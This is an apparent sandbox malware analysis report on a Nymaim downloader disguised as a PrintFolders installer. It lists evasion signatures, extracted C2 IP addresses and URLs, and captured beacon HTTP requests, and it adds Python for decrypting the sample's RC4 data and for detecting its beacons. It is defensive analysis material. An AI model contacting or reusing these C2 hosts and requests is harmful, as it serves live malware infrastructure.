Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 753425
MD5: 2ed741014b8cdafd91a740432a3cffa1
SHA1: 3d65ac9a3d0950a55d4c7e4cb5a6fbfeab180cab
SHA256: fc33189d3c146375f5742bbb0e82277e2b8ed3789d8feae27939e834b07ee8dc
Tags: exe

Detection

Nymaim
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected Nymaim
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Uses taskkill to terminate processes
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to detect sandboxes (foreground window change detection)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

Source: http://171.22.30.106/library.php URL Reputation: Label: malware
Source: http://171.22.30.106/library.phpXZ Avira URL Cloud: Label: malware
Source: http://171.22.30.106/library.phpBZ Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\uywwtiNQ.exe ReversingLabs: Detection: 46%
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Joe Sandbox ML: detected
Source: 2.2.PrintFolders.exe.10000000.6.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.3.file.exe.20b8000.6.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.PrintFolders.exe.400000.1.unpack Malware Configuration Extractor: Nymaim {"C2 addresses": ["45.139.105.1", "85.31.46.167", "107.182.129.235", "171.22.30.106"]}
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_10001000 ISCryptGetVersion, 1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_10001130 ArcFourCrypt, 1_2_10001130
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy, 2_2_00403770
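Offline reconstruction of the CryptAcquireContextW / CryptCreateHash / CryptHashData / CryptDeriveKey / CryptDecrypt chain seen in PrintFolders.exe at 2_2_00403770. This is an added example, not code from the report or from the sample: the report shows only the API sequence, so the hash algorithm (MD5) and cipher (RC4, 128-bit) are assumptions; the key expansion itself follows Microsoft's documented CryptDeriveKey behaviour for non-SHA-2 hashes, and the password and ciphertext below are constructed for the round trip.

```python
"""Reproduce CryptCreateHash -> CryptHashData -> CryptDeriveKey -> CryptDecrypt
without a Windows box.

Added example, not code from the sandbox report or the sample. The report
shows the API order only; MD5 as the hash and RC4 as the cipher are
assumptions. The key expansion is Microsoft's documented CryptDeriveKey
algorithm for MD5/SHA-1 style hashes.
"""
import hashlib


def crypt_derive_key(hash_name: str, password: bytes, key_len: int) -> bytes:
    """Derive key_len bytes the way CryptDeriveKey does for non-SHA-2 hashes.

    If the requested key fits inside the digest, the key is the digest prefix.
    Otherwise the digest is XORed into a 64-byte 0x36 pad and a 64-byte 0x5C
    pad, both pads are hashed, and the two digests are concatenated.
    """
    h = hashlib.new(hash_name, password).digest()
    if key_len <= len(h):
        return h[:key_len]
    pad36 = bytes(0x36 ^ b for b in h) + b"\x36" * (64 - len(h))
    pad5c = bytes(0x5C ^ b for b in h) + b"\x5C" * (64 - len(h))
    expanded = (hashlib.new(hash_name, pad36).digest()
                + hashlib.new(hash_name, pad5c).digest())
    return expanded[:key_len]


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (CALG_RC4); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def crypt_decrypt(password: bytes, blob: bytes,
                  hash_name: str = "md5", key_len: int = 16) -> bytes:
    """The report's chain with an assumed RC4 cipher and 128-bit key."""
    return rc4(crypt_derive_key(hash_name, password, key_len), blob)


# Constructed test vector: encrypt a known string with the same routine so
# the round trip can be checked without the real sample's blob.
DEMO_PASSWORD = b"demo-password"
DEMO_PLAINTEXT = b"http://171.22.30.106/library.php"
DEMO_BLOB = crypt_decrypt(DEMO_PASSWORD, DEMO_PLAINTEXT)
```

To use this against the real sample, dump the password buffer passed to CryptHashData and the ciphertext passed to CryptDecrypt from a debugger and swap them in for the constructed values; if the result is not readable, the hash or cipher assumption is wrong and should be corrected from the CALG_* constants visible at the call site.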

Compliance

Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Unpacked PE file: 2.2.PrintFolders.exe.400000.1.unpack
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: Binary string: E:\DATA\Codework\PrintFolders\source\Release\Russian.pdb source: is-2632S.tmp.1.dr
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0046C770 FindFirstFileA,FindNextFileA,FindClose, 1_2_0046C770
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00474708 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, 1_2_00474708
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00451554 FindFirstFileA,GetLastError, 1_2_00451554
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0048A778 FindFirstFileA,6D2B69D0,FindNextFileA,FindClose, 1_2_0048A778
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004729D4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, 1_2_004729D4
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0045CA54 FindFirstFileA,FindNextFileA,FindClose, 1_2_0045CA54
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00406FEC FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 1_2_00406FEC
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0045DB60 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0045DB60
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0045DEF4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0045DEF4
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, 2_2_00404490
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00423E2D FindFirstFileExW, 2_2_00423E2D
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_1000959D FindFirstFileExW, 2_2_1000959D
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp

Networking

Source: Malware configuration extractor IPs: 45.139.105.1
Source: Malware configuration extractor IPs: 85.31.46.167
Source: Malware configuration extractor IPs: 107.182.129.235
Source: Malware configuration extractor IPs: 171.22.30.106
Source: Joe Sandbox View ASN Name: CMCSUS
Source: Joe Sandbox View IP Address: 45.139.105.171
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.105.171 (4 connections)
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235 (46 connections)
Source: PrintFolders.exe, 00000002.00000002.325958183.0000000001773000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://107.182.129.235/storage/extension.php
Source: PrintFolders.exe, 00000002.00000002.325958183.0000000001773000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://107.182.129.235/storage/extension.phpum
Source: PrintFolders.exe, 00000002.00000002.325942100.0000000001762000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://107.182.129.235/storage/ping.php
Source: PrintFolders.exe, 00000002.00000002.325942100.0000000001762000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://171.22.30.106/library.phpBZ
Source: PrintFolders.exe, 00000002.00000002.325942100.0000000001762000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://171.22.30.106/library.phpXZ
Source: file.exe, 00000000.00000003.239393272.00000000020B1000.00000004.00001000.00020000.00000000.sdmp, is-QPTG8.tmp, 00000001.00000003.240607544.0000000002750000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://pfolders.atopoint.com
Source: file.exe, 00000000.00000003.327202532.00000000020B1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.239393272.00000000020B1000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://pfolders.atopoint.com.
Source: file.exe, 00000000.00000003.239322832.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.327202532.00000000020B1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.239393272.00000000020B1000.00000004.00001000.00020000.00000000.sdmp, is-QPTG8.tmp, 00000001.00000003.240607544.0000000002750000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.atopoint.com
Source: file.exe, 00000000.00000003.327202532.00000000020B1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.239393272.00000000020B1000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.atopoint.com.
Source: file.exe String found in binary or memory: http://www.innosetup.com
Source: is-QPTG8.tmp, is-QPTG8.tmp, 00000001.00000000.240048151.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-48N1K.tmp.1.dr, is-QPTG8.tmp.0.dr String found in binary or memory: http://www.innosetup.com/
Source: file.exe, 00000000.00000003.239484290.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.239653432.00000000020B8000.00000004.00001000.00020000.00000000.sdmp, is-QPTG8.tmp, 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmp, is-48N1K.tmp.1.dr, is-QPTG8.tmp.0.dr String found in binary or memory: http://www.innosetup.comDVarFileInfo$
Source: file.exe, 00000000.00000003.239484290.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.239653432.00000000020B8000.00000004.00001000.00020000.00000000.sdmp, is-QPTG8.tmp, is-QPTG8.tmp, 00000001.00000000.240048151.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-48N1K.tmp.1.dr, is-QPTG8.tmp.0.dr String found in binary or memory: http://www.remobjects.com/?ps
Source: file.exe, 00000000.00000003.239484290.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.239653432.00000000020B8000.00000004.00001000.00020000.00000000.sdmp, is-QPTG8.tmp, 00000001.00000000.240048151.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-48N1K.tmp.1.dr, is-QPTG8.tmp.0.dr String found in binary or memory: http://www.remobjects.com/?psU
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar, 2_2_00401B30
Source: global traffic HTTP traffic detected:
  GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1
  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
  User-Agent: 1
  Host: 45.139.105.171
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /storage/ping.php HTTP/1.1
  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
  User-Agent: 0
  Host: 107.182.129.235
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /storage/extension.php HTTP/1.1
  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
  User-Agent: 1
  Host: 107.182.129.235
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected (11 identical requests):
  GET /library.php HTTP/1.1
  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
  User-Agent: 2
  Host: 171.22.30.106
  Connection: Keep-Alive
  Cache-Control: no-cache
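Detection logic for the beacon pattern in the requests above: a literal IP in the Host header with no preceding DNS query, a single-digit User-Agent that rotates between "0", "1" and "2", and the count.php / ping.php / extension.php / library.php endpoints. This is an added example, not part of the sandbox report; the sample log lines are constructed from the captured requests (headers abbreviated), and the one-request-per-line layout with " | " between headers is an assumed log format, not something the report specifies.

```python
"""Flag Nymaim-style HTTP beacons in a request log.

Added example, not part of the sandbox report. The log lines are
constructed from the requests the report captured; the layout (one request
per line, headers joined with ' | ') is an assumed format.
"""
import ipaddress
import re
from typing import Dict, List

# Constructed from the GET requests in the report, plus one benign control.
SAMPLE_LOG = """\
GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1 | User-Agent: 1 | Host: 45.139.105.171 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
GET /storage/ping.php HTTP/1.1 | User-Agent: 0 | Host: 107.182.129.235 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
GET /library.php HTTP/1.1 | User-Agent: 2 | Host: 171.22.30.106 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
GET /index.html HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) | Host: www.example.com | Accept-Language: en-US,en;q=0.9
"""

# C2 addresses from the report's malware configuration extractor, plus the
# address the sample actually contacted during the run.
KNOWN_C2 = {"45.139.105.1", "85.31.46.167", "107.182.129.235",
            "171.22.30.106", "45.139.105.171"}


def parse_request(line: str) -> Dict[str, str]:
    """Split one log line into the request line and lower-cased header names."""
    parts = [p.strip() for p in line.split(" | ")]
    req: Dict[str, str] = {"request": parts[0]}
    for hdr in parts[1:]:
        name, _, value = hdr.partition(":")
        req[name.strip().lower()] = value.strip()
    return req


def is_bare_ip(host: str) -> bool:
    """True when the Host header is a literal IP, i.e. no DNS lookup preceded it."""
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def score_request(req: Dict[str, str]) -> List[str]:
    """Return the indicators matched by one parsed request."""
    hits: List[str] = []
    host = req.get("host", "")
    ua = req.get("user-agent", "")
    if host in KNOWN_C2:
        hits.append("known-c2-host")
    if is_bare_ip(host):
        hits.append("bare-ip-host")
    # The sample uses a bare digit as User-Agent ("0", "1", "2").
    if re.fullmatch(r"\d", ua):
        hits.append("single-digit-user-agent")
    if re.search(r"/(count|ping|extension|library)\.php(\?|\s|$)", req["request"]):
        hits.append("nymaim-php-endpoint")
    return hits


def scan_log(text: str) -> Dict[str, List[str]]:
    """Map each non-empty log line to its matched indicators (empty if clean)."""
    return {line: score_request(parse_request(line))
            for line in text.splitlines() if line.strip()}
```

The bare-IP and single-digit User-Agent checks are the durable part; the IP list and the PHP endpoint names are this sample's infrastructure and will rotate, so they belong in a threat-intel feed rather than in the rule.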
Source: file.exe, 00000000.00000002.327400312.0000000000708000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Source: Yara match File source: 2.2.PrintFolders.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PrintFolders.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PrintFolders.exe.33a0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PrintFolders.exe.33a0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.325696039.0000000001660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.326103420.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004081C8 0_2_004081C8
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00468940 1_2_00468940
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00460F30 1_2_00460F30
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0043DF70 1_2_0043DF70
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004303A4 1_2_004303A4
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0047A6D8 1_2_0047A6D8
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004446E8 1_2_004446E8
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00434994 1_2_00434994
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0045AA90 1_2_0045AA90
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00480BDC 1_2_00480BDC
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00444C90 1_2_00444C90
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00462F38 1_2_00462F38
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00445388 1_2_00445388
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00435698 1_2_00435698
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00445794 1_2_00445794
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0042F948 1_2_0042F948
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00457BB4 1_2_00457BB4
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00404490 2_2_00404490
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_004096F0 2_2_004096F0
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_004056A0 2_2_004056A0
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00406800 2_2_00406800
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00406AA0 2_2_00406AA0
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00404D40 2_2_00404D40
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00405F40 2_2_00405F40
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00402F20 2_2_00402F20
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_004150D3 2_2_004150D3
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00415305 2_2_00415305
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_004223A9 2_2_004223A9
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00419510 2_2_00419510
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00404840 2_2_00404840
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00426850 2_2_00426850
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00410A50 2_2_00410A50
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_0042AB9A 2_2_0042AB9A
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00421C88 2_2_00421C88
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_0042ACBA 2_2_0042ACBA
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00447D2D 2_2_00447D2D
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00428D39 2_2_00428D39
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00404F20 2_2_00404F20
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_1000F670 2_2_1000F670
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_1000EC61 2_2_1000EC61
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: String function: 10003C50 appears 34 times
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: String function: 0040F9E0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: String function: 004035DC appears 90 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: String function: 00403548 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: String function: 00407B08 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: String function: 00445FF4 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: String function: 00455A04 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: String function: 004037CC appears 193 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: String function: 00405AA4 appears 92 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: String function: 00455814 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: String function: 004462C4 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: String function: 004348AC appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: String function: 00451AFC appears 62 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: String function: 00408DF0 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00423D9C NtdllDefWindowProc_A, 1_2_00423D9C
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004127F0 NtdllDefWindowProc_A, 1_2_004127F0
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004551C4 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A, 1_2_004551C4
Source: is-QPTG8.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-QPTG8.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-QPTG8.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-48N1K.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-48N1K.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-48N1K.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-2632S.tmp.1.dr Static PE information: No import functions for PE file found
Source: file.exe, 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename" vs file.exe
Source: file.exe, 00000000.00000003.239484290.00000000021A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe, 00000000.00000003.239484290.00000000021A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename6 vs file.exe
Source: file.exe, 00000000.00000003.239653432.00000000020B8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe, 00000000.00000003.239653432.00000000020B8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename6 vs file.exe
Source: file.exe Binary or memory string: OriginalFilename" vs file.exe
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\PrintFolders\Russian.dll (copy) A960C9DCD1D5C7B79F4FDD38D6F25299F4F7925555E381EA4AB6217681482F62
Source: PrintFolders.exe.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp "C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp" /SL4 $40228 "C:\Users\user\Desktop\file.exe" 1252960 51712
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process created: C:\Program Files (x86)\PrintFolders\PrintFolders.exe "C:\Program Files (x86)\PrintFolders\PrintFolders.exe"
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\uywwtiNQ.exe
